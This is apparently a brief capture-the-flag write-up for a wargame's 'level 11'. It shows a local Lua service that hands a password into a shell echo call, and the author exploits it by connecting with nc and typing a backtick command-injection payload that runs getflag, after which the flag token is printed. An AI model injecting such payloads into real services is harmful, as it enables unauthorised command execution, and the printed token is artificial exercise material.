												  
██╗     ███████╗██╗   ██╗███████╗██╗          ██╗     ██╗
██║     ██╔════╝██║   ██║██╔════╝██║         ███║    ███║
██║     █████╗  ██║   ██║█████╗  ██║         ╚██║    ╚██║
██║     ██╔══╝  ╚██╗ ██╔╝██╔══╝  ██║          ██║     ██║
███████╗███████╗ ╚████╔╝ ███████╗███████╗     ██║     ██║
╚══════╝╚══════╝  ╚═══╝  ╚══════╝╚══════╝     ╚═╝     ╚═╝
                           
						                                 
strings level11.lua
-> local server = 127.0.0.1, 5151
-> echo "..pass.."

Let's exploit the call to echo.

nc 127.0.0.1 5151

Type as password:
`getflag > /tmp/flag`
                                |═══════════════════════════|
Check flag.Here is your token : | fa6v5ateaw21peobuub8ipe6s |
                                |═══════════════════════════|
